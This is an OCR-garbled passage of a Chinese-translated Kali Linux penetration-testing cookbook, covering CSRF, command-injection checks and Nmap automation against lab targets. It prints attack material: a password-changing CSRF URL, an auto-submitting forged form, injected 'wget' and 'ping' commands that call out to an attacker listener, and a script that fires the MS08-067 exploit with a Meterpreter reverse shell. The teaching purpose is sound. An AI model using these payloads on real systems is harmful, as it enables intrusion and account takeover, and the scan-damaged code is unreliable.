CSRF 可 能 会 出 现在 GET 或 POST 方法 的 事务 中 ，DVWA 提供 了 GET 方法 
CSRF 漏洞 的 一 个 良好 示例 。 应 用 允许 用 户 通过 GET 方法 提交 新 的 值 两 次 来 更 新 


TE 


GET /dvwa/vulnerabilities/csrf/?password_new=password&password_ 
conf-password&Change-Change HTTP/1.1 

Host: 172.16.36.135 User-Agent: Mozilla/5.0 (X11; Linux i686; rv 
:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 

Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */ 
*;q-0.8 

Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://172.16.36.135/dvwa/vulnerabilities/csrf/ 

Cookie: security-low; PHPSESSID-8aa4a24cd6087911eca39c1cb95a7b0c 


由 于 缺少 CSRF 控制 ， 我 们 尝试 利用 这 个 漏洞 。 如 果 Web 应 用 的 用 户 被 引诱 来 访 
问 某 个 URL， 其 中 含有 预先 配置 的 password new 和 password | conf 值 ， 攻 
击 者 就 能 强迫 受害 者 将 密码 修改 为 攻击 者 的 选择 。 下 面 的 URL 是 个 利用 的 示例 。 
如 果 受 害 者 访问 了 这 个 链接 ， 它 们 的 密码 会 被 修改 为 compromised ° 


http://172.16.36.135/dvwa/vulnerabilities/csrf/?password new=co 
mpromised&password_conf=compromised&Change=Change# 


但 是 ， 这 种 可 以 简单 利用 的 CSRF 漏洞 很 少 存 在 。 这 是 因为 多 数 开发 者 对 安全 拥有 
起 码 的 终止 ， 不 会 使 用 GET 方法 参数 来 执行 安全 事务 。POST 方法 CSRF 的 一 个 
例子 是 Mutillidae 应 用 的 blog 功能 ， 像 这 样 : 


POST /mutillidae/index.php?page-add-to-your-blog.php HTTP/1.1 
Host: 172.16.36.135 

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/2010010 
1 Firefox/18.0 Iceweasel/18.0.1 Accept: text/html,application/xh 
tml-xml,application/xml;q-0.9,*/*;q-0.8 

Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://172.16.36.135/mutillidae/index.php?page-add-to-y 
our-blog. php 

Cookie: username=Victim; uid-17; PHPSESSID-8aa4a24cd6087911eca39 
cicb95a7 bOc 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 98 


csrf-token-zSecurityIsDisabled&blog entry=Thist+is+my+blog+entry&a 
dd-toyour -blog-php-submit -button=Save+Blog+Entry 


上 面 的 例子 中 ， 我 们 可 以 看 到 ， 验 证 用 户 所 提交 的 blog AVIA 
INNER 20e DICERE ee a 
需要 构造 恶意 页 面 ， 它 能 导致 受害 者 提交 所 需 的 参数 。 下 面 是 个 POST 方法 CSRF 
攻击 的 例子 


<html> 
<head> 
«title»«/title» 
</head> 
<body> 
«form name="csrf" method="post" action="http://172.16.36.135 
/ mutillidae/index.php?page=add-t$ 
<input type="hidden" name="csrf-token" value="SecurityIs 
Disabled" /> 
<input type="hidden" name="blog_entry" value="HACKED" /> 


<input type="hidden" name="add-to-your-blog-phpsubmit -bu 
tton" value="Save+BlogtEntr$ 
</form> 
<script type="text/javascript"> 
document .csrf.submit(); 
</script> </body> </html> 


这 个 恶意 Web 页 面 使 用 了 HTML 表单 ， 它 将 多 个 隐藏 的 输入 字段 返回 给 服务 器 ， 
这 些 字段 对 应 Mutillidae 应 用 的 blog 入 口 提交 请 求 所 需 的 相同 输入 。 此 外 ，JS 

用 于 提交 表单 。 所 有 这 些 事情 在 受害 者 不 执行 任何 操作 的 情况 下 就 会 发 生 。 考 虑 下 
面 的 例子 : 


root@KaliLinux:~# mv CSRF.html /var/www/ 

root@KaliLinux:~# /etc/init.d/apache2 start 

[....] Starting web server: apache2apache2: Could not reliably d 
etermine the server's fully qualified domain name, using 127.0.1 
.1 for ServerName 

. Ok 


为 了 部 署 这 个 恶意 Web 内 容 ， 应 该 将 其 移动 到 Web IK B T. » # Kali P > Rik 
的 Apache Web 根 目 录 是 /var/www/ 。 同 样 ， 确 保 Apache2 服务 已 打开 。 像 这 
样 : 


1Current Blog Entries 


"| Mme | me | Comme 
1 [Viim [2014-04-1405:1149 HACKED | 





"n 


当 验 证 后 的 受害 者 浏览 器 恶意 页 面 时 ， 受 害 者 会 自动 重 定 向 到 Mutillidae 博客 应 
用 ， 并 提交 博客 入 口 HACKED 


o 


工作 原理 


CSRF 的 成 因 是 请 求 最 终 由 用 户 的 会 话 生成 。 这 个 攻击 利用 受害 者 浏览 器 已 经 和 远 
程 Web 服务 器 建立 连接 的 信任 。 在 GET 方法 CSRF 的 例子 中 ， 受 害 者 被 诱导 访 
问 某 个 URL， 其 中 的 参数 为 恶意 事务 而 定义 。 在 POST 方法 CSRF 的 例子 中 ， 受 
害 者 被 诱导 浏览 定义 了 参数 的 页 面 ， 这 些 参 数 随后 会 由 受害 者 的 浏览 器 转发 给 漏洞 
服务 器 ， 来 指定 恶意 事务 。 在 每 个 例子 中 ， 事 务 由 于 请 求 来 自 受 害 者 的 浏览 器 而 被 
执行 ， 受 害 者 已 经 和 漏洞 服务 器 建立 了 可 信 的 会 话 。 


7.18 使 用 HTTP 流量 验证 命令 注入 漏洞 


命令 注入 可 能 是 移植 Web 应 用 攻击 向 量 中 最 危险 的 漏洞 了 。 多 数 攻 击 者 尝试 利用 
该 漏洞 ， 以 期 望 它 们 最 后 能 够 在 底层 OS 上 执行 任意 的 代码 。 命 令 执 行 漏洞 提供 了 
无 需 额外 步骤 的 可 能 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 使 用 Web 服务 器 日 志 或 自 定 
义 Web 服务 脚本 来 确认 命令 执行 漏洞 。 


准备 


为 了 对 目标 执行 命令 注入 漏洞 测试 ， 你 需要 拥有 运行 一 个 或 多 个 含有 命令 执行 漏洞 
的 Web 应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 
任务 。 Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 
上 。 配 置 Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2” 秘 


f o 
此 外 ， 这 个 秘籍 也 需要 使 用 例如 VIM 或 者 Nano 的 文本 编辑 器 ， 将 脚本 写 到 文件 系 
统 。 更 多 编写 脚本 的 信息 请 参考 第 一 章 的 “使 用 文本 编辑 器 (VIM 或 Nano) "秘籍 。 


操作 步骤 


通过 执行 命令 ， 强 迫 后 端 系统 和 Web 服务 器 交互 ， 我 们 就 能 够 验证 Web 应 用 中 的 
命令 注入 漏洞 。 日 志 可 以 作为 漏洞 服务 器 和 它 交 互 的 证 据 。 作 为 替代 ， 可 以 编写 一 
个 自 定义 脚本 来 生成 一 个 临时 的 Web 服务 ， 它 可 以 监听 外 部 连接 ， 并 打印 接收 到 
的 请 求 。 下 面 的 Python 代码 完成 了 这 件 事 情 : 


#!/usr/bin/python 

import socket 

httprecv = socket.socket(socket.AF INET, socket.SOCK STREAM) 
httprecv.setsockopt(socket.SOL SOCKET, socket.SO REUSEADDR, 1) 
httprecv.bind(("0.0.0.0",8000)) 

httprecv.listen(2) 


(client, ( ip,sock)) - httprecv.accept() 
print "Received connection from : ", ip 
data - client.recv(4096) 

print str(data) 


client.close() 
httprecv.close() 


一 旦 执行 脚本 ， 我 们 需要 强迫 目标 服务 器 和 监听 服务 交互 ， 来 确认 命令 注入 漏洞 。 

DWVA 应 用 拥有 ping 功能 ， 可 以 用 于 ping 一 个 指定 IP 地址 。 用 户 输 入 直接 传递 
给 系统 调用 ， 可 以 修改 来 执行 底层 OS 的 任意 命令 、 我 们 可 以 通过 使 用 分 号 来 添加 
多 个 命令 ， 每 个 命令 依次 排列 ， 像 这 样 : 


Vulnerability: Command Execution 
Ping for FREE 


Enter an IP address below: 





1; wget http://172.16.36.224:8000 | submit 


在 上 面 的 例子 中 ， 输 入 用 于 ping 127.0.0.1 ， 并 且 
对 http://172.16.36.224:8000 执行 wget 。 wget 请 求 对 应 临时 的 Python 
监听 服务 。 在 提交 输入 后 ， 我 们 可 以 通过 参考 脚本 的 输入 来 验证 命令 执行 : 


root@KaliLinux:~# ./httprecv.py 

Received connection from : 172.16.36.135 
GET / HTTP/1.0 

User-Agent: Wget/1.10.2 

Accept: */* Host: 172.16.36.224:8000 
Connection: Keep-Alive 


工作 原理 


Python 脚本 用 于 确认 命令 执行 漏洞， 因为 它 证 明了 命令 可 以 通过 来 自 不 同系 统 的 注 
入 载荷 在 目标 服务 器 上 执行 。 载 荷 输入 到 服务 器 的 时 候 ， 不 可 能 同时 执行 相似 的 请 
求 。 但 是 ， | 的 流量 的 丨 正 来 源 ， 我 们 也 可 以 轻易 尝试 多 次 
来 排除 错误 + 月 青 况 9 


7.19 使 用 ICMP 流量 来 验证 命 令 注 入 


命令 注入 可 能 是 移植 Web 应 用 攻击 向 量 中 最 危险 的 漏洞 了 。 多 数 攻击 者 尝 试 利用 

该 漏洞 ， 以 期 望 它们 最 后 能 够 在 底层 OS 上 执行 任意 的 代码 。 命 令 执行 漏洞 提供 

无 需 额外 步骤 的 可 能 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 使 用 |CMP 流量 来 编写 
认命 令 执行 漏洞 的 自 定义 脚本 。 


准备 


为 了 对 目标 执行 命令 注入 漏洞 测试 ， 你 需要 拥有 运行 一 个 或 多 个 含有 命令 执行 漏洞 
的 Web 应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 
任务 。 Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 
上 。 配 置 Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $^ 


籍 。 


此 外 ， 这 个 秘籍 也 需要 使 用 例如 VIM 或 者 Nano 的 文本 编辑 器 ， 将 脚本 写 到 文件 系 
统 。 更 多 编写 脚本 的 信息 请 参考 第 一 章 的 “使 用 文本 编辑 器 (VIM X Nano) "秘籍 。 


操作 步骤 


通过 执行 命令 ， 强 迫 后 端 系统 发 送 ICMP 流量 给 监听 服务 ， 我 们 可 以 验证 Web 应 
用 中 的 命令 注入 漏洞 。 接 收 到 ICMP 回响 请 求 可 以 用 于 识别 漏洞 系统 。 下 面 是 一 
段 Python 代码 ， 使 用 Scapy 库 来 实现 : 


#!/usr/bin/python 


import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


def rules(pkt): 
Ery: 
if (pkt[IP].dst=="172.16.36.224") and (pkt[ICMP]): 


print str(pkt[IP].src) + " is exploitable" 
except: 
pass 


print “Listening for Incoming ICMP Traffic. Use Ctrl+C to stop 
listening" 


sniff (lfilter=rules, store=0) 


在 ICMP 监听 器 执行 之 后 ， 我 们 需要 尝试 从 漏洞 服务 器 向 监听 服务 发 送 ICMP 回响 
请 求 。 这 可 以 通过 将 ping 命令 注入 到 存在 命令 注入 漏洞 的 用 户 输 入 来 完成 。 在 
Mutillidae 中 ， 执 行 DNS 枚 举 的 功能 存在 漏洞 ， 它 直接 将 用 户 输入 传递 给 系统 调 
用 。 通 过 使 用 分 号 ， 单 独 的 ping 请 求 可 以 追加 到 用 户 输入 后 面 。 


Hostname/IP m; ping 172.16.36.224 -c 1j 
| Lookup DNS | 





Results for google.com; ping 172.16.36.224 -c 1 


假设 服务 器 存在 命令 注入 漏洞 ，Python 监听 器 会 提示 收 到 了 ICMP 回响 请 求 ， 而 
且 目 标 服务 器 可 能 存在 漏洞 。 


root@KaliLinux:~# ./listener.py 

Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listeni 
ng 

172.16.36.135 is exploitable 


工作 原理 


Python 脚本 用 于 确认 命令 执行 漏洞 ， 因 为 它 证 明了 命令 可 以 通过 来 自 不 同系 统 的 注 
入 载荷 在 目标 服务 器 上 执行 。 载 荷 输入 到 服务 器 的 时 候 ， 不 可 能 同时 执行 相似 的 请 
求 。 但 是 ， 即 使 载荷 并 不 是 被 检测 到 的 流量 的 昊 正 来 源 ， 我们 也 可 以 轻 吻 尝试 多 次 
来 排除 错误 情况 。 


第 八 章 自动 化 Kali 工具 


作者 : Justin Hutchens 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


Kali Linux 渗透 测试 平台 提供 了 大 量 高 效 的 工具 ， 来 完成 企业 渗透 测试 中 所 需 的 大 
多 数 常见 任务 。 然而 ， 有 时 单个 工具 不 足以 完成 给 定 的 任务 。 与 构建 完全 新 的 脚 
本 或 程序 来 完成 具有 挑战 性 的 任务 相 比 ， 编 写 使 用 现 有 工具 以 及 按 需 修改 其 行为 的 
脚本 通常 更 有 效 。 实用 的 本 地 脚本 的 常见 类 型 包括 用 于 分 析 或 管理 现 有 工具 的 输 
出 ， 将 多 个 工具 串联 到 一 起 的 脚本 ， 或 者 必须 顺序 执行 的 多 线程 任务 的 脚本 。 


8.1 的 Nmap greppable 输出 分 析 


Nmap 被 大 多 数 安全 专业 人 员 认 为 是 Kali Linux 平台 中 最 流 息 和 有 效 的 工具 之 一 。 
但 是 由 于 这 个 工具 的 惊人 和 强大 的 功能 ， 全 面 的 端口 扫描 和 服务 识别 可 能 非常 耗 
时 。 在 整个 渗透 测试 中 ， 不 针对 不 同 的 服务 端口 执行 目标 扫描 ， 而 是 对 所 有 可 能 的 
TCP 和 UDP 服务 执行 全 面 扫描 ， 然 后 仅 在 整个 评估 过 程 中 引用 这 些 结果 ， 是 一 个 
更 好 的 方法 。Nmap 提供 了 XML 和 greppable 输出 格式 来 辅助 这 个 过 程 。 


理想 情况 下 ， 你 应 该 熟悉 这 些 格式 ， 你 可 以 从 输出 文件 中 按 需 提取 所 需 的 信息 。 但 
是 作为 参考 ， 此 秘籍 会 提供 示例 脚本 ， 可 用 于 提取 标识 为 在 指定 端口 上 运行 服务 的 
所 有 IP 地 址 。 


准备 


要 使 用 本 秘籍 中 演示 的 脚本 ， 你 需要 使 用 grepable 格式 的 Nmap 输出 结果 。 这 可 
以 通过 执行 Nmap 端口 扫描 并 使 用 -oA 选项 输出 所 有 格式 ， 或 -oG 来 专门 输出 
greppable 格式 来 获取 。 在 提供 的 示例 中 ， 多 个 系统 在 单个 /24 子 网 上 扫描 ， 这 
包括 Windows XP 和 Metasploitable2。 有 关 设 置 Metasploitable2 的 更 多 信息 ， 请 
参阅 本 书 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 有 关 设 置 Windows 系统 的 更 多 
言 息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Windows Server $bá$ > 此 外 ， 本 节 需 要 使 用 
文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "4048 o 


操作 步骤 


下 面 的 示例 演示 了 使 用 bash 脚本 语言 甚至 是 bash 命令 行 界面 (CLI) ， 从 Nmap 
输出 的 greppable 格式 中 提取 信息 ， 这 十 分 简单 : 


Z! /bin/bash 


if [ ! $1 ]; then echo "Usage: £./script «port #> <filename>"; 
exite fa 


port-$1 
file-$2 


echo "Systems with port $port open:" 


grep $port $file | grep open | cut -d "" -f 2 


为 了 确保 你 能 理解 脚本 的 功能 ， 我 们 将 按 顺 序 对 每 一 行进 行 讲解 。 脚 本 的 第 一 行 只 
指向 bash 解释 器 ， 以 便 脚 本 可 以 独立 执行 。 脚 本 的 第 二 行 是 一 

个 if ... then 条 件 语句 ， 用 于 测试 是 否 向 脚本 提供 了 任何 参数 。 这 只 是 最 小 的 
输入 验证 ， 以 确保 脚本 用 户 知道 工具 的 使 用 。 如 果 工 具 在 没有 提供 任何 参数 的 情况 
下 执行 ， 脚 本 将 echo 其 使 用 的 描述 ， 然 后 退出 。 使 用 描述 会 请 求 两 个 参数 ， 包 
括 或 端口 号 和 文件 名 。 


接 下 来 的 两 行将 每 个 输入 值 分 配给 更 易于 理解 的 变量 。 第 一 个 输入 值 是 端口 号 ， 第 
二 个 输入 值 是 Nmap 输出 文件 。 然后 ， 脚 本 将 检查 Nmap greppable 输出 文件 ， 
来 判断 指定 端口 号 的 服务 上 运行 了 什么 系统 (如 果 有 的 话 ) 。 


root@KaliLinux:~# ./service identifier.sh Usage: £./script «port 
#> «filename» 


妆 你 在 没有 任何 参数 的 情况 下 执行 脚本 时 ， 将 输出 用 法 描述 。 要 使 用 脚本 ， 我 们 需 
要 输入 一 个 要 检查 的 端口 号 和 Nmap grepable 输出 文件 的 文件 名 。 提供 的 示例 

在 / 24 网 络 上 执行 扫描 ， 并 使 用 文件 名 netscan.txt 生成 greppable 输出 文 
Ho 然后， 该 脚本 用 于 分 析 此 文件 ， 并 确定 各 个 端口 上 的 活动 服务 中 是 否 能 发 现任 
何 主机 。 


root@KaliLinux:~# ./service identifier.sh 80 netscan.txt 
Systems with port 80 open: 

172.16.36.135 

172.16.36.225 

root@KaliLinux:~# ./service_identifier.sh 22 netscan.txt 
Systems with port 22 open: 

172.16.36.135 

172.16.36.225 172.16.36.239 

root@KaliLinux:~# ./service_identifier.sh 445 netscan.txt 
Systems with port 445 open: 

172.16.36.135 

172.16.36.225 


所 展示 的 示例 执行 脚本 来 判断 端口 80, 22 和 445 上 所 运行 的 主机 。 脚 本 的 输出 显 
示 正 在 评估 的 端口 号 ， 然 后 列 出 输出 文件 中 任何 系统 的 I|P 地 址 ， 这 些 系统 在 该 端口 
上 运行 活动 服务 。 


工作 原理 


grep 是 一 个 功能 强大 的 命令 行 工 具 ， 可 在 bash 中 用 于 从 输出 或 从 给 定 文件 中 提 
取 特 定 内 容 。 在 此 秘籍 提供 的 脚本 中 ， grep 用 于 从 Nmap grepable 输出 文件 中 
提取 给 定 端口 号 的 任何 实例 。 AA grep 函数 的 输出 包括 多 条 信息 ， 所 以 输出 通 
过 管道 传递 到 cut 函数 ， 来 提取 IP 地 址 ， 然 后 将 其 输出 到 终端 。 


8.2 使 用 指定 NSE 脚本 的 Nmap 端口 扫描 


许多 Nmap 和 脚本 引擎 (NSE) 的 脚本 仅 适 用 于 在 指定 端口 上 运行 的 服务 。 考 

Š smb-check-vulns.nse 脚本 的 用 法 。 此 脚本 将 评估 在 TCP 445 端口 上 运行 的 
SMB 服务 的 常见 服务 漏洞 。 如 果 此 脚本 在 整个 网 络 上 执行 ， 则 必须 重新 完成 任务 
来 确定 端口 445 是 否 打开 ， 以 及 每 个 目标 系统 上 是 否 可 访问 SMB 服务 。 这 是 在 评 
估 的 扫描 阶段 期 间 可 能 已 经 完成 的 任务 。 Bash 脚本 可 以 用 于 利用 现 有 的 Nmap 
greppable 输出 文件 来 运行 服务 特定 的 NSE 脚本 ， 它 们 只 针对 运行 这 些 服务 的 系 
统 。 在 本 秘籍 中 ， 我 们 将 演示 如 何 使 用 脚本 来 确定 在 先前 扫描 结果 中 运行 TCP 
445 上 的 服务 的 主机 ， 然 后 仅 针 对 这 些 系统 运行 smb-check-vulns.nse 脚本 。 


准备 


要 使 用 本 秘籍 中 演示 的 脚本 ， 你 需要 使 用 grepable 格式 的 Nmap 输出 结果 。 这 可 
以 通过 执行 Nmap 端口 扫描 并 使 用 -oA 选项 输出 所 有 格式 ， 或 -oG 来 专门 输出 
greppable 格式 来 获取 。 在 提供 的 示例 中 ， 多 个 系统 在 单个 /24 子 网 上 扫描 ， 这 
包括 Windows XP 和 Metasploitable2。 有 关 设 置 Metasploitable2 的 更 多 信息 ， 请 
参阅 本 书 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 有 关 设 置 Windows 系统 的 更 多 
言 息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Windows Server tkis o 此 外 ， 本 节 需 要 使 用 
文本 编辑 器 (如 VIM 或 Nano). 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 将 多 个 任务 串联 在 一 起 。 这 里 ， 我 们 需要 执 
ít Nmap grepable 输出 文件 的 分 析 ， 然 后 由 该 任务 标识 的 信息 用 于 针对 不 同 的 系统 
执行 Nmap NSE 脚本 。 具体 来 说 ， 第 一 个 任务 将 确定 哪些 系统 在 TCP 445 上 运行 
服务 ， 然 后 针对 每 个 系统 执行 smb-check-vulns.nse 脚本 。 


Z! /bin/bash 


if [ ! $1 ]; then echo "Usage: #./script <file>"; exit; fi 


file-$1 
for x in $(grep open $file | grep 445 | cut -d " " -f 2); 
do nmap --script smb-check-vulns.nse -p 445 $x --scriptargs- 
unsafe-1; 
done 


为 了 确保 你 能 理解 脚本 的 功能 ， 我 们 将 按 顺序 讲解 每 一 行 。 前 几 行 与 上 一 个 秘籍 中 
讨论 的 脚本 类 似 。 第 一 行 指向 bash 解释 器 ， 第 二 行 检查 是 否 提 供 参 数 ， 第 三 行将 
输入 值 赋 给 多 于 理解 的 变量 名 。 脚本 的 正文 有 一 定 区 分 。 for 循环 用 于 遍历 通 
过 grep BARRA IP 地 址 列表 。 从 grep 函数 输出 的 IP 地 址 列表 对 应 在 TCP 
端口 445 上 运行 服务 的 所 有 系统 。 然 后 对 这 些 IP 地 址 中 的 每 一 个 执行 Nmap NSE 
脚本 。 通过 仅 在 先前 已 标识 为 在 TCP 445 上 运行 服务 的 系统 上 运行 此 脚本 ， 执 行 
NSE 扫描 所 需 的 时 间 大 大 减少 。 


root@KaliLinux:~# ./smb eval.sh 
Usage: #./script <file> 


通过 执行 不 带 任何 参数 的 脚本 ， 脚 本 将 输出 用 法 描述 。 该 描述 表明 ， 应 当 提 供 现 有 
Nmap grepable 输出 文件 的 文件 名 。 当 提 供 Nmap 输出 文件 时 ， 脚 本 快速 分 析 文 
件 来 查找 具有 TOP 445 服务 的 任何 系统 ， 然 后 在 每 个 系统 上 运行 NSE 脚本 ， 并 将 
结果 输出 到 终端 。 


root@KaliLinux:~# ./smb eval.sh netscan.txt 

Starting Nmap 6.25 ( http://nmap.org ) at 2014-04-10 05:45 EDT 
Nmap scan report for 172.16.36.135 

Host is up (0.00035s latency). 

PORT STATE SERVICE 

445/tcp open microsoft-ds 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Host script results: 

| smb-check-vulns: 

| Conficker: UNKNOWN; not Windows, or Windows with disabled br 
owser service (CLEAN); or Windows with crashed browser service ( 
possibly INFECTED). 

| 

| If you know the remote system is Windows, try rebooting it an 
d scanning 


| 
|_ again. (Error NT STATUS OBJECT NAME NOT FOUND) 
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE 


| MS06-025: NO SERVICE (the Ras RPC service is inactive) 

|. MS07-029: NO SERVICE (the Dns Server RPC service is inactive 
) 

Nmap done: 1 IP address (1 host up) scanned in 5.21 seconds 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-04-10 05:45 EDT 
Nmap scan report for 172.16.36.225 

Host is up (0.00041s latency). 

PORT STATE SERVICE 

445/tcp open microsoft-ds 

MAC Address: 00:0C:29:18:11:FB (VMware) 


Host script results: 

| smb-check-vulns: 

| MS08-067: VULNERABLE 

| Conficker: Likely CLEAN 

| regsvc DoS: NOT VULNERABLE 

| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE 

| MS06-025: NO SERVICE (the Ras RPC service is inactive) 

|. MS07-029: NO SERVICE (the Dns Server RPC service is inactive 
) 


Nmap done: 1 IP address (1 host up) scanned in 5.18 seconds 


在 提供 的 示例 中 ， 脚 本 会 传递 到 netscan.txt 输出 文件 。 对 文件 进行 快速 分 析 
后 ， 脚 本 确定 两 个 系统 正在 端口 445 上 运行 服务 。 然 后 使 
用 smb-check-vulns.nse 脚本 扫描 每 个 服务 ， 并 在 终端 中 生成 输出 。 


工作 原理 


通过 提供 grep 序列 作为 for 循环 要 使 用 的 值 ， 此 秘籍 中 的 bash 脚本 基本 上 只 
是 循环 遍历 该 函数 的 输出 。 通过 独立 运行 该 函数 ， 可 以 看 到 它 只 提取 对 应 运行 
SMB 服务 的 主机 的 IP 地 址 列表 。 然后 ， for 循环 遍历 这 些 I|P 地 址 ， 并 对 每 个 IP 
地 址 执行 NSE 脚本 。 


8.3 使 用 MSF 漏洞 利用 的 Nmap MSE 漏洞 扫描 


在 某 些 情况 下 ， 开 发 一 个 将 漏洞 扫描 与 利用 相 结合 的 脚本 可 能 会 有 所 帮助 。 漏洞 扫 
描 通 常会 导致 误 报 ， 因 此 通过 执行 漏洞 扫描 的 后 续 利 用 ， 可 以 立即 验证 这 些 发 现 的 
正确 性 。 此 秘籍 使 用 bash 脚本 来 执行 smb-check-vulns.nse 脚本 ， 来 确定 主机 
是 否 存在 MS08-067 NetAPI 漏洞 ， 并 且 如 果 NSE 脚本 显示 如 此 ，Metasploit 会 用 
T 自动 学 试 利用 它 来 验证 。 


准备 


要 使 用 本 秘籍 中 演示 的 脚本 ， 你 需要 使 用 grepable 格式 的 Nmap 输出 结果 。 这 可 
以 通过 执行 Nmap 端口 扫描 并 使 用 -oA 选项 输出 所 有 格式 ， 或 -o6 来 专门 输出 
greppable 格式 来 获取 。 在 提供 的 示例 中 ， 多 个 系统 在 单个 /24 子 网 上 扫描 ， 这 
包括 Windows XP 和 Metasploitable2。 有 关 设 置 Metasploitable2 的 更 多 信息 ， 请 
参阅 本 书 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 有 关 设 置 Windows 系统 的 更 多 
信息 ， 请 参阅 本 书 第 一 章 中 的 “安装 Windows Server" 秘 籍 。 此 外 ， 本 节 需 要 使 用 
文本 编辑 器 (如 VIM X; Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚 本 的 更 多 信息 ， 
请 参阅 本 书 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


下 面 的 示例 演示 了 如 何 使 用 bash 脚本 将 漏洞 扫描 和 目标 利用 的 任务 串联 到 一 起 。 
在 这 种 情况 下 ， smb-checkvulns.nse 脚本 用 于 确定 系统 是 否 容 易 受 到 MS08- 

067 攻击 ， 然 后 如 果 发 现 系 统 存在 漏洞 ， 则 对 系统 执行 相应 的 Metasploit 漏洞 利 

用 。 


4! /bin/bash 

if | ! $1 ]; then echo "Usage: £./script <RHOST> <LHOST> <LPORT>" 
/ 

exit; fi 


rhost-$1 
lhost-$2 
lport=$3 


nmap --script smb-check-vulns.nse -p 445 $rhost --scriptargs=uns 
afe=1 -oN tmp_output.txt 
if [ $(grep MS08-067 tmp output.txt | cut -d " " -f 5) = "VULNER 
ABLE" ]; 

then echo "$rhost appears to be vulnerable, exploiting with 
Metasploit: 4; 

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/ 
meterpreter/reverse_tcp RHOST=$rhost LHOST=$lhost LPORT=$lport E 
/ 
Laas 
rm tmp_output.txt 

加 Eee 


为 了 确保 你 能 理解 脚本 的 功能 ， 我 们 将 按 顺序 对 每 一 行进 行 讲解 。 脚 本 中 的 前 几 行 
与 本 章 前 面 讨 论 的 脚本 相同 。 第 一 行 定义 解释 器 ， 第 二 行 测试 输入 ， 第 三 ， 第 四 和 
第 五 行 都 用 于 根据 用 户 输 入 定义 变量 。 在 此 脚本 中 ， 提 供 的 用 户 变 量 对 应 
Metasploit 中 使 用 的 变量 。 RHOST 变量 应 该 定义 目标 的 IP 地址 ， LHOST 变量 应 
该 定义 反 向 监听 器 的 IP 地 址 ， LPORT 变量 应 该 定义 正在 监听 的 本 地 端口 。 然 后 脚 
本 在 正文 中 执行 的 第 一 个 任务 是 ， 对 目标 系统 的 IP 地 址 执 

行 smb-check-vulns.nse 脚本 ， 它 由 RHOST 输入 定义 。 然 后 ， 结 果 以 正常 格式 
输出 到 临时 文本 文件 。 然后， if ... then 条 件 语句 与 grep 函数 结合 使 用 ， 来 
测试 输出 文件 中 是 否 有 唯一 的 字符 串 ， 它 表明 系统 存在 漏洞 。 如 果 发 现 了 唯一 的 字 
符 串 ， 则 脚本 会 显 式 系统 看 起 来 存在 漏洞 ， 然 后 使 用 Metasploit 框架 命令 行 界面 
(MSFCLI) 使 用 Meterpreter 载荷 执行 Metasploit 漏洞 利用 。 最 后 ， 在 加 载 漏洞 
利用 后 ， 使 用 rm 函数 从 文件 系统 中 删除 Nmap 临时 输出 文 

件 。 test n xploit.sh bash 命令 执行 如 下 : 


root@KaliLinux:~# ./test n xploit.sh 
Usage: #./script «RHOST» <LHOST> <LPORT> 


如 果 在 不 提供 任何 参数 的 情况 下 执行 脚本 ， 脚 本 将 输出 相应 的 用 法 。 此 使 用 描述 显 
示 ， 该 脚本 应 以 参数 RHOST ， LHOST 和 LPORT 执行 。 这些 输 入 值 将 用 于 
Nmap NSE 漏洞 扫描 和 (如 果 有 保证 ) 使 用 Metasploit 在 目标 系统 上 执行 利用 。 
在 以 下 示例 中 ， 脚 本 用 于 确定 IP 地 址 为 172.16.36.225 的 主机 是 否 存在 漏洞 。 
如 果 系 统 被 确定 为 存在 漏洞 ， 则 会 执行 利用 ， 并 连接 到 反 向 TCP Meterpreter 处 理 
器 ， 该 处 理 其 在 IP 地 址 172.16.36.239 的 TCP 端口 4444 上 监听 系统 。 


root@KaliLinux:~# ./test n xploit.sh 172.16.36.225 172.16.36.239 
4444 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-04-10 05:58 EDT 
Nmap scan report for 172.16.36.225 

Host is up (0.00077s latency). 

PORT STATE SERVICE 

445/tcp open microsoft-ds 

MAC Address: 00:0C:29:18:11:FB (VMware) 


Host script results: 

| smb-check-vulns: 

| MS08-067: VULNERABLE 

| Conficker: Likely CLEAN 

| regsvc DoS: NOT VULNERABLE 

